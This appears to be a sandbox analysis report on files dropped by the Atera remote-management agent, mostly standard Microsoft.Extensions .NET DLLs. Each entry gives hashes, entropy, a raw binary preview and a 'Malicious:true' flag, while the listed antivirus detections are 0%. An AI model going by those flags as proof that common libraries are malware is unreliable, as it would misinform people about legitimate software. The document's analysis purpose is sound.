                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9............." ..0.................. ........... ..............................i.....`.....................................O.......t...............P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc..............................@..B.......................H........I...s............................................................{....*..{....*..{....*r.(......}......}......}....*....0..Y........u........L.,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o ...*.*.*....0..K....... M.. )UU.Z(.....{....o!...X )UU.Z(.....{....o"...X )UU.Z(.....{....o#...X*..0...........r...p......%..{.......%q.........-.&.+.......o$....%..{.......%q.........-.&.+.......o$....%..{.......%q.........-.&.+.......o$....(%...*..(...+&.(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):70224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.253576832389666
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:9a5mhZg6DVOVZF85MrFvPg6VivoTLGGq5MnAEJJBIba9kEpYi60bzg:wohZwVL85MrFn1gsGGq5MnpxIb6d76Es
                                                                                                                                                                                                                                                                                              MD5:C954777CF815CEAC6BE1E29BA6B5CF98
                                                                                                                                                                                                                                                                                              SHA1:A1C895366DA03839680237CE8D3F49EF8F839449
                                                                                                                                                                                                                                                                                              SHA-256:EC94D14AEFCAE5C0D75633A1E7AA3C578AA67D965BB337D98783F3802E7E893F
                                                                                                                                                                                                                                                                                              SHA-512:8C65380376B653715882C6A290F61D1F67948DCEAD8CD47CA2E766F91CBAC70824C12885BD4C671C91E235B6F1BB6EDFF3EEF223B3F8E6D6201B54E1D6975F90
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............" ..0.................. ........... .......................@......K.....`.....................................O.......................P(... ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......xb..D............................................................0..b........(....(....,..(...+&.(...+&.(...+&.(...+&(....,..(...+&.(...+&.(...+&(....,..(...+&.(...+&.(...+&*...0...........(....&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&*...0..y.......s.......~....%-.&~..........s....%.....(...+%-.&.+.(!...%-%&r...p.....("...o#...r9..p($...s%...z}&.......'...s(...(...+&*".(...+&*".( ..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):193616
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.0038612181162465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:9hakSdKo5IgGu6BXZbYOWribVM+kqCfo8OECZjmuaK1R1J3yjLGe5X3YOt:9hVSMtM+zNL1JivGehv
                                                                                                                                                                                                                                                                                              MD5:D95241F92AEA199B23D972094C7761A7
                                                                                                                                                                                                                                                                                              SHA1:80FEDECDA98D05F8FD7AF3B5AEB2E4448B761303
                                                                                                                                                                                                                                                                                              SHA-256:B6DB510896DD31DF655654426478D669AACA8CA4B06A575A46EA7256C6419ACF
                                                                                                                                                                                                                                                                                              SHA-512:A93F48CBA7C728B46602D09206C1D854E170CD64A8F9038577438F10417CE835A966F29F4A4E1CE93A529960CEEB7A81D8E4562A90F27B05C460213099CCC6F1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............z.... ........... .......................@.......L....`.................................(...O.......$...............P(... ..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc....... ......................@..B................\.......H.......0...P................ ............................................(9...*^.(9..........%...}....*:.(9.....}....*:.(9.....}....*:.(9.....}....*....0..G.........(:...}.......}.......}.......}.......}......|......(...+..|....(<...*..0..G.........(:...}.......}.......}.......}.......}......|......(...+..|....(<...*..0..G.........(=...}r......}s......}t......}u......}q.....|r.....(...+..|r...(?...*..0..G.........(=...}z......}{......}|......}}......}y.....|z.....(...+..|z..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.50639372294577
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:pxrv7hVmaET50kv96TG/FwzzRjz6qMvckxGMCWsfNWONyb8E9VF6IYijSJIVxIWZ:f7hUaETSkXZp32REpYi60bRt
                                                                                                                                                                                                                                                                                              MD5:6D9E346F5743696D9067F4D2F119FE37
                                                                                                                                                                                                                                                                                              SHA1:E1D731DC2B4EB5302E68FD62A3B7551396CDC4AB
                                                                                                                                                                                                                                                                                              SHA-256:A0118B5134DE26ABCDBA3EA8EA27870F02B8C449BA901C562E0CE410FB1CF7D1
                                                                                                                                                                                                                                                                                              SHA-512:491456754EFB187216BCD455A8F5EFE835BCA015D14DD062434C9F28176442547DEF5B092988073AC0096E441A0EE293CD227C839523D3AC18417F1808C5945C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ya..........." ..0..8...........V... ...`....... ....................................`.................................oV..O....`..|............D..P(..........XU..T............................................ ............... ..H............text....6... ...8.................. ..`.rsrc...|....`.......:..............@..@.reloc...............B..............@..B.................V......H........'...)...........Q..X....T......................................*.-..(....*..s+...z..(,...,..-..s+...z.r...ps-...z.*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(/...-..,..*.*.(....,.r/..p......%...%...(0...*..(1...*.(....,.r/..p......%...%...%...(0...*...(2...*.(....,!r/..p......%...%...%...%...(0...*....(3...*..,&(....,..r/..pr/..p.(0...(4...*..(5...*.*.(....,.r/..p......%...%...(0...*...(6...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):42576
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.318325319304968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:XrGlacqr6kPubIQGxeVdrxiUCEpYi60rjZm:Xrf36kEIQGx8xiUD76J
                                                                                                                                                                                                                                                                                              MD5:1B89907495D9E16AF1D245E70DD3B040
                                                                                                                                                                                                                                                                                              SHA1:C1CD267FCEF8ECB547CE348F1D6DD6D4EBB821B0
                                                                                                                                                                                                                                                                                              SHA-256:BE30F976789479A0B88E472FC0E355F3B4BF32EBB439676CB9EDAD5C341A7263
                                                                                                                                                                                                                                                                                              SHA-512:63CDC73F7AEA1832E31336EE2738E3EAD40882E4E443C604CE8D45F21E57B133E2E50FB955D6E23162F0829AEB67273BD4BD9D8D0FB327B0474A252D32464A45
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<..........." ..0..p............... ........... ..............................&.....`....................................O....................~..P(..............T............................................ ............... ..H............text... o... ...p.................. ..`.rsrc................r..............@..@.reloc...............|..............@..B........................H........9...G..........d.......<.......................................*.-..(....*..s!...z..("...,..-..s!...z.r...ps#...z.*.~....*..0..........(....,..*..(.....o$......&...*...................0...........(.......(%...-..,..*.*.(....,.r/..p......%...%...(&...*..('...*.(....,.r/..p......%...%...%...(&...*...((...*.(....,!r/..p......%...%...%...%...(&...*....()...*..,&(....,..r/..pr/..p.(&...(*...*..(+...*.*.(....,.r/..p......%...%...(&...*...(,...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.61779167641697
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D+6wnFbhCxwXaHsRJ0eDKfW9/nWWNyb8E9VF6IYijSJIVx5Oyxu:S6+FN04IcCSnEpYi60wMu
                                                                                                                                                                                                                                                                                              MD5:991002049E26CA5B2F1AE2DD525C995C
                                                                                                                                                                                                                                                                                              SHA1:630C6A965285423D4BA3ED23F0D046BFE2DCBF18
                                                                                                                                                                                                                                                                                              SHA-256:35E41A3220E417F64426E191B172C935C3A06B49A5C23207A886BE9E04833E7D
                                                                                                                                                                                                                                                                                              SHA-512:3B342C8200FD8AEEA4057E5CE724C7EFF1306F2F27B09C4ABC8868F91B73767976A277A1F8B9A3CF35304F293E107E76182355E48DAE4BEFFD0F1F14A4D04FEF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+..........." ..0..,...........K... ...`....... ....................................`..................................J..O....`...............8..P(...........I..T............................................ ............... ..H............text....+... ...,.................. ..`.rsrc........`......................@..@.reloc...............6..............@..B.................J......H........%...............D.......I......................................*.-..(....*..s....z..(....,..-..s....z.r...ps....z.*.~....*..0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r/..p......%...%...("...*..(#...*.(....,.r/..p......%...%...%...("...*...($...*.(....,!r/..p......%...%...%...%...("...*....(%...*..,&(....,..r/..pr/..p.("...(&...*..('...*.*.(....,.r/..p......%...%...("...*...((...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):21072
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.623257262935385
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:gSh0UpsW+K0ihWQS9WUPeWYNyb8E9VF6IYijSJIVxJbhlom:gS0ULPUrQEpYi60JVj
                                                                                                                                                                                                                                                                                              MD5:9FD144D2E62A95A18E337E8234713171
                                                                                                                                                                                                                                                                                              SHA1:A3677314A8C263BDB532B378F7D951DECED6733A
                                                                                                                                                                                                                                                                                              SHA-256:2C74962DDE702D8181CD01826472F568BFF70429D4F3F0977903DE788E128FA3
                                                                                                                                                                                                                                                                                              SHA-512:95D6D30ADA5F4BBD45A10637CC3CFE1A243BF42FE7FFCE1DC81554172C4D11A6527DFCC79FD540180E34CDE478693AB1E758F28D51E3AF6B887813CAB5AFB170
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Fn............" ..0..............;... ...@....... ..............................[l....`..................................;..O....@.. ............*..P(...`......d:..T............................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`.......(..............@..B.................;......H........".......................9......................................:.s....o....&.*V.s....%.o....o....&.*"..(...+*v.(.....~....}.....~....}....*..(......%-.&~....}......{....(....}....*2.(....(....*...0..2........(....o......{....(....-..r...p.{....r...p( .....*...0..........(!...s".....o#....8.....o$.......(%...t$.....o$.......(&...t$.....r...p.o'...,...r...pr7..p..(....+s.re..p.o'...,...re..pr...p..(....+P.r...p.o'...,...r...pr...p..(....+-.r...p.o'...,...r...p...(....+

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.526471694241477
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:MMczpIwUCdKetxyFCLJNsLghXABAqWqf6WeNyb8E9VF6IYijSJIVxF8g31E:Zct7lVtfMewAECEpYi60ygK
                                                                                                                                                                                                                                                                                              MD5:D1837FA6A46594200AEF84C6CB5425D4
                                                                                                                                                                                                                                                                                              SHA1:53E476EF21C281C224A9DDFD63DE95EEB9583460
                                                                                                                                                                                                                                                                                              SHA-256:45C26D14110073F193E86891F420B706FB2CA63208C37562BB471AFA80AF9E74
                                                                                                                                                                                                                                                                                              SHA-512:AD314103A274CBE62A647B4B59B0E99724A1CA4DCB52FE516D6E5C3FB0BAC39CADB4E6FA99D573BBCAB5F6E238B3E37B1067D3E45FE7C4DBC4ED80ED68424706
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..8...........W... ...`....... ..............................@.....`.................................KW..O....`..,............D..P(..........0V..T............................................ ............... ..H............text....7... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............B..............@..B.................W......H........(...(..........xQ..8....U......................................*.-..(....*..s....z..(....,..-..s....z.r...ps ...z.*.~....*..0..........(....,..*..(.....o!......&...*...................0...........(.......("...-..,..*.*.(....,.r/..p......%...%...(#...*..($...*.(....,.r/..p......%...%...%...(#...*...(%...*.(....,!r/..p......%...%...%...%...(#...*....(&...*..,&(....,..r/..pr/..p.(#...('...*..((...*.*.(....,.r/..p......%...%...(#...*...()...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26704
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.570026795492357
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Y+J1o5egFMvqo5e1l6vWkf2WoNyb8E9VF6IYijSJIVxL96Pj:71WFMbhN4EpYi60BK
                                                                                                                                                                                                                                                                                              MD5:222B5E6512C1D65F59F7C5AA75D68DD2
                                                                                                                                                                                                                                                                                              SHA1:29E9A28EBDF6166475A9D3706EAA500CAA5E2D79
                                                                                                                                                                                                                                                                                              SHA-256:3F422633EAE1FD9DF134BE1694C6C4A3C3019CF240DB6B4B9DBD2FEA8160F253
                                                                                                                                                                                                                                                                                              SHA-512:FE096820E431DCB2538A326C72BB598BAF8313890267AE2DA92076C32C0D4FC6B38BB460C9E38F2127A0CF7BB6461D875ED2B02962AFCBE1D181B848B80BF9E1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`..........." ..0..4...........S... ...`....... ..............................:.....`.................................GS..O....`..P............@..P(..........@R..T............................................ ............... ..H............text....3... ...4.................. ..`.rsrc...P....`.......6..............@..@.reloc...............>..............@..B................{S......H........'..P%...........L.......Q......................................*.-..(....*..s....z..( ...,..-..s....z.r...ps!...z.*.~....*..0..........(....,..*..(.....o"......&...*..............!....0...........(.......(#...-..,..*.*.(....,.r/..p......%...%...($...*..(%...*.(....,.r/..p......%...%...%...($...*...(&...*.(....,!r/..p......%...%...%...%...($...*....('...*..,&(....,..r/..pr/..p.($...((...*..()...*.*.(....,.r/..p......%...%...($...*...(*...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.571329249700056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:l/sfDn/DN9gRxL1iF8gSE1LGDW9PCWeNyb8E9VF6IYijSJIVx1+myPB4:obNmxcRGe6EpYi604B4
                                                                                                                                                                                                                                                                                              MD5:3BC988F43478A5E1A6719F9EB2CCCA71
                                                                                                                                                                                                                                                                                              SHA1:8720F54A4A075DD67664F4D89F8612EB809394E8
                                                                                                                                                                                                                                                                                              SHA-256:7F193464B4698D8077025C4089FC718530FE616375A97F7D6ED073694A9C53A5
                                                                                                                                                                                                                                                                                              SHA-512:DE6193AC74DD023B43EDF22586C55240D5FCAD420FEF1E829951DD5CBEAEEFF16FF68680A5F04B6D36AF6A607A10E1B52DE0976C9DBB46851340DE499D716809
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..............M... ...`....... ...............................\....`.................................mM..O....`...............:..P(..........XL..T............................................ ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................M......H.......p%... ...........E..P....K......................................*.-..(....*..s....z..(....,..-..s....z.r...ps....z.*.~....*..0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r/..p......%...%...("...*..(#...*.(....,.r/..p......%...%...%...("...*...($...*.(....,!r/..p......%...%...%...%...("...*....(%...*..,&(....,..r/..pr/..p.("...(&...*..('...*.*.(....,.r/..p......%...%...("...*...((...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.399923725131256
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:9LJOZTEW1WTsTeVnrI/yqCtHUafO+ukucyLEpYi60IMMa:9LJOpEQzTp/AX2+uMyk76/MMa
                                                                                                                                                                                                                                                                                              MD5:E8CD1E0A6A89129AD776C7D7BFEF4907
                                                                                                                                                                                                                                                                                              SHA1:7E6F3672648C4E56402BACBD9BDACAFE9A31424F
                                                                                                                                                                                                                                                                                              SHA-256:305218D92D5D9B1786BCA766E431F29725F260BEED61823E643F875E4676B03E
                                                                                                                                                                                                                                                                                              SHA-512:7B641F2022286EA87090F0FDC5A4A1C82F6A48CF9CF32F1FFE23B04EDD6E556BEE86EF49B7130CDEFE461E2D49ADA2A1DEB85BA3990CC17BF99A95EE87EFB9B0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............" ..0..x..........j.... ........... ....................................`.....................................O.......................P(..............T............................................ ............... ..H............text...pw... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................I.......H........<...S..........................................................*.-..(....*..s+...z..(,...,..-..s+...z.r...ps-...z.*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(/...-..,..*.*.(....,.r/..p......%...%...(0...*..(1...*.(....,.r/..p......%...%...%...(0...*...(2...*.(....,!r/..p......%...%...%...%...(0...*....(3...*..,&(....,..r/..pr/..p.(0...(4...*..(5...*.*.(....,.r/..p......%...%...(0...*...(6...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.151192295647228
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:3CYbKF0XEQqb7Uo5hGrrd0i0A7Hf6dbW9yI76T:xXp0pk/6dK9yIc
                                                                                                                                                                                                                                                                                              MD5:6DE9D1736C081359EB51A1B41ADB196C
                                                                                                                                                                                                                                                                                              SHA1:0E884000FDB1C0964AE2F4F5A24B430DC0C181AA
                                                                                                                                                                                                                                                                                              SHA-256:75F9AA6E3B3733CD6857C479310BA211A01160A60D366435DA2604E7046D3EBF
                                                                                                                                                                                                                                                                                              SHA-512:2B9265C448B21699A512539902A39BC8106EC044C75608C8CA0CC33C5E0FE0F374B41D2B7C74CC3F78DB68594B81D93011C903EA76A83B9DD585CFBBF4C6BC85
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t............" ..0.............*.... ........... .......................@......#.....`.....................................O.......................P(... ..........T............................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........Z...{..................4.......................................*.-..(....*..s*...z..(+...,..-..s*...z.r...ps,...z.*.~....*..0..........(....,..*..(.....o-......&...*.............. ....0...........(.......(....-..,..*.*.(....,.r/..p......%...%...(/...*..(0...*.(....,.r/..p......%...%...%...(/...*...(1...*.(....,!r/..p......%...%...%...%...(/...*....(2...*..,&(....,..r/..pr/..p.(/...(3...*..(4...*.*.(....,.r/..p......%...%...(/...*...(5...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):92240
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.260824569233109
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:wsS1Tz5tF1bQWVsdJCKTvZEmwbyQMB76V203:5QH5tsWUvZEmNQMBDc
                                                                                                                                                                                                                                                                                              MD5:9BD1B5B151EE828D50BA1F0AF141923C
                                                                                                                                                                                                                                                                                              SHA1:C4666D2D6A74131C458E6987B83AE1F4188C2BC0
                                                                                                                                                                                                                                                                                              SHA-256:A2F6E1CD60C1194F1AA9798A2209CDA5079F3D3F6BA4B699E079FC856B7D7BFC
                                                                                                                                                                                                                                                                                              SHA-512:21C332A21BDC72DAFB71C6DF0E80F23A78B20F6D6C452EDEE02ABA6A1D46C3167D489202218E73C0C60E2B2C6586A9EC20824B2A951D4E916924A520E9E47463
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jb{..........." ..0..6...........S... ...`....... ...............................y....`..................................S..O....`...............@..P(...........R..T............................................ ............... ..H............text....4... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................S......H........u...............<..X... R.......................................~....*..0..........(....,..*..(.....o-......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(/...*..(0...*.(....,.r...p......%...%...%...(/...*...(1...*.(....,!r...p......%...%...%...%...(/...*....(2...*..,&(....,..r...pr...p.(/...(3...*..(4...*.*.(....,.r...p......%...%...(/...*...(5...*.(....,.r...p......%...%...%...(/...*....(6...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):30288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.433740703561921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:WVZvGPhQTlrYouV5vE+YlOjqmfQ4vWOfRW9Nyb8E9VF6IYijSJIVx12+FOum73:c+5QqnV1Zb/2EpYi603i3
                                                                                                                                                                                                                                                                                              MD5:1B3CD16BA16B8ADF734A81FF688246C6
